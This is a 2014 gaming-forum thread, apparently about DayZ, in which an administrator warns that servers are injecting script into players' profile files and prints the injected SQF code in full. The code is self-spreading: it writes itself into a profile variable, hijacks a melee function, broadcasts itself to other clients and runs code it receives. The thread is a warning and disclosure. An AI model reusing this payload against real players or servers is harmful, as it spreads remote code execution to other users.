Author Topic: Injecting code into profile saves  (Read 2209 times)

Offline Robba

• BadRobot
  • Administrator
  • Nihilistic Misanthrope
    • gravediggaz.org
Injecting code into profile saves
« on: January 06, 2014, 01:03:58 am »
Check docs\dayz other profiles\prof name\prof name.vars.dayzprofile,
Look for anything like the following at the bottom.
This is being injected into the config somehow from dodgy servers. I've found it in mine :(

More info, its not totally bad juju, but the dev says its no supposed to be there. 
More to follow..
News just in, delete the file if you have the junk in it, it'll re-create. It only holds some key configs, and default char layout.

spawn {waitUntil{alive player};sleep 5;bowensinfectioncode=[0,{}];if(!isnil"b_loop")then{v_bowen=1;terminate b_loop;terminate re_loop};b_loop=[]spawn{v_bowen=1;while{true}do{bowen_startAttack={default_stuff=compile preprocessFileLineNumbers"\dz\modulesDayZ\scripts\melee_startAttack.sqf";if(isnil"v_bowen")then{v_bowen=1;[]spawn{namespaceVar = compile ('waitUntil{alive player};sleep 5;bowensinfectioncode=[0,{}];if(!isnil"b_loop")then{v_bowen='+(str v_bowen)+';terminate b_loop;terminate re_loop};b_loop=[]spawn{v_bowen='+(str v_bowen)+';while{true}do{bowen_startAttack='+(str melee_startAttack)+';if(isnil"pv_bowen")then{pv_bowen=v_bowen;for"_i"from 0 to 999 do{_i publicVariableClient"melee_startAttack"}};if(v_bowen>=pv_bowen)then{if(v_bowen>pv_bowen)then{pv_bowen=v_bowen;for"_i"from 0 to 999 do{_i publicVariableClient"pv_bowen"}};melee_startAttack=bowen_startAttack;for"_i"from 0 to 999 do{_i publicVariableClient"melee_startAttack"}};if!(isnil"bowensinfectioncode")then{for"_i"from 0 to 999 do{bowensinfection=bowensinfectioncode;_i publicVariableClient"bowensinfection"};[]spawn(bowensinfectioncode select 1)};Sleep(30+(random 30))}};re_loop=[]spawn{v_bowen='+(str v_bowen)+';while{true}do{if!(isnil"bowen")then{call bowen;bowen=nil};if!(isnil"bowensinfection")then{_version=bowensinfection select 0;_updatecode=bowensinfection select 1;if((bowensinfectioncode select 0)<_version)then{bowensinfectioncode=[_version,_updatecode]};bowensinfection=nil};sleep 0.1}};'); with missionnamespace do {_whitelist=["bo"+"wen","Ra"+"iin","Tor"+"mbush"];if((name player)in _whitelist)then{[]spawn namespaceVar;systemchat"Server is Infected"}else{_whitelist=["bo"+"wen","Ra"+"iin","Tor"+"nbush"];if!(name player in _whitelist)then{profilenamespace setvariable["igui_grid_chat_x",("with missionnamespace do {[] spawn "+str namespaceVar+";};")];saveprofilenamespace;[]spawn namespaceVar}};};}}else{if(v_bowen<1)then{v_bowen=1;[]spawn{namespaceVar = compile ('waitUntil{alive player};sleep 5;bowensinfectioncode=[0,{}];if(!isnil"b_loop")then{v_bowen='+(str v_bowen)+';terminate b_loop;terminate re_loop};b_loop=[]spawn{v_bowen='+(str v_bowen)+';while{true}do{bowen_startAttack='+(str melee_startAttack)+';if(isnil"pv_bowen")then{pv_bowen=v_bowen;for"_i"from 0 to 999 do{_i publicVariableClient"melee_startAttack"}};if(v_bowen>=pv_bowen)then{if(v_bowen>pv_bowen)then{pv_bowen=v_bowen;for"_i"from 0 to 999 do{_i publicVariableClient"pv_bowen"}};melee_startAttack=bowen_startAttack;for"_i"from 0 to 999 do{_i publicVariableClient"melee_startAttack"}};if!(isnil"bowensinfectioncode")then{for"_i"from 0 to 999 do{bowensinfection=bowensinfectioncode;_i publicVariableClient"bowensinfection"};[]spawn(bowensinfectioncode select 1)};Sleep(30+(random 30))}};re_loop=[]spawn{v_bowen='+(str v_bowen)+';while{true}do{if!(isnil"bowen")then{call bowen;bowen=nil};if!(isnil"bowensinfection")then{_version=bowensinfection select 0;_updatecode=bowensinfection select 1;if((bowensinfectioncode select 0)<_version)then{bowensinfectioncode=[_version,_updatecode]};bowensinfection=nil};sleep 0.1}};'); with missionnamespace do {_whitelist=["bo"+"wen","Ra"+"iin","Tor"+"mbush"];if((name player)in _whitelist)then{[]spawn namespaceVar;systemchat"Server is Infected"}else{_whitelist=["bo"+"wen","Ra"+"iin","Tor"+"nbush"];if!(name player in _whitelist)then{profilenamespace setvariable["igui_grid_chat_x",("with missionnamespace do {[] spawn "+str namespaceVar+";};")];saveprofilenamespace;[]spawn namespaceVar}};};}}};_handled=_this call default_stuff;_handled;};if(isnil"pv_bowen")then{pv_bowen=v_bowen;for"_i"from 0 to 999 do{_i publicVariableClient"melee_startAttack"}};if(v_bowen>=pv_bowen)then{if(v_bowen>pv_bowen)then{pv_bowen=v_bowen;for"_i"from 0 to 999 do{_i publicVariableClient"pv_bowen"}};melee_startAttack=bowen_startAttack;for"_i"from 0 to 999 do{_i publicVariableClient"melee_startAttack"}};if!(isnil"bowensinfectioncode")then{for"_i"from 0 to 999 do{bowensinfection=bowensinfectioncode;_i publicVariableClient"bowensinfection"};[]spawn(bowensinfectioncode select 1)};Sleep(30+(random 30))}};re_loop=[]spawn{v_bowen=1;while{true}do{if!(isnil"bowen")then{call bowen;bowen=nil};if!(isnil"bowensinfection")then{_version=bowensinfection select 0;_updatecode=bowensinfection select 1;if((bowensinfectioncode select 0)<_version)then{bowensinfectioncode=[_version,_updatecode]};bowensinfection=nil};sleep
« Last Edit: January 06, 2014, 01:40:12 am by Robba »
Sick of this life,Not that you'd care. I'm not the only one with whom these feelings I share..
Nobody understands, quite why we're here, We're searchin' for answers that never appear..
But maybe if I looked real hard I'd I'd see you're tryin' too to understand this life that we're all going through..
(Then when she said she was gonna like wreck my car... I didn't know what to do)

Offline groundpounder1

• Professional lurker. Amateur everything else
  • Junior Admin
  • I aint give, no fuck.
Re: Injecting code into profile saves
« Reply #1 on: January 06, 2014, 05:09:36 am »
yeah, mine had it too, probably from joining dozens of servers everytime i play, trying to find daylight ones,and ones that havent been running for hours so theres no gear anywhere.

What does it do?

Offline Robba

• BadRobot
  • Administrator
  • Nihilistic Misanthrope
    • gravediggaz.org
« Reply #2 on: January 06, 2014, 05:13:38 am »
Apparently, It detects if certain scripts are loaded, and sends you annoying messages about said scripts.

No idea how true this is though.
Sick of this life,Not that you'd care. I'm not the only one with whom these feelings I share..
Nobody understands, quite why we're here, We're searchin' for answers that never appear..
But maybe if I looked real hard I'd I'd see you're tryin' too to understand this life that we're all going through..
(Then when she said she was gonna like wreck my car... I didn't know what to do)

Offline AkaiMPC

• GameServer Admin
    • my favourite page, and description of myself
« Reply #3 on: January 06, 2014, 02:14:27 pm »
I've joined servers where I started getting a message like "1st message of the day" then 2nd and so on up to 5th fuck knows what that was.

User

Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length

* Navigation

* Statistics

• *Total Posts: 19461
  • *Total Topics: 9645
  • *Online Today: 24
  • *Most Online: 112
(December 08, 2012, 10:48:53 am)
  • *Users: 0
  • *Guests: 15
  • *Spiders: 2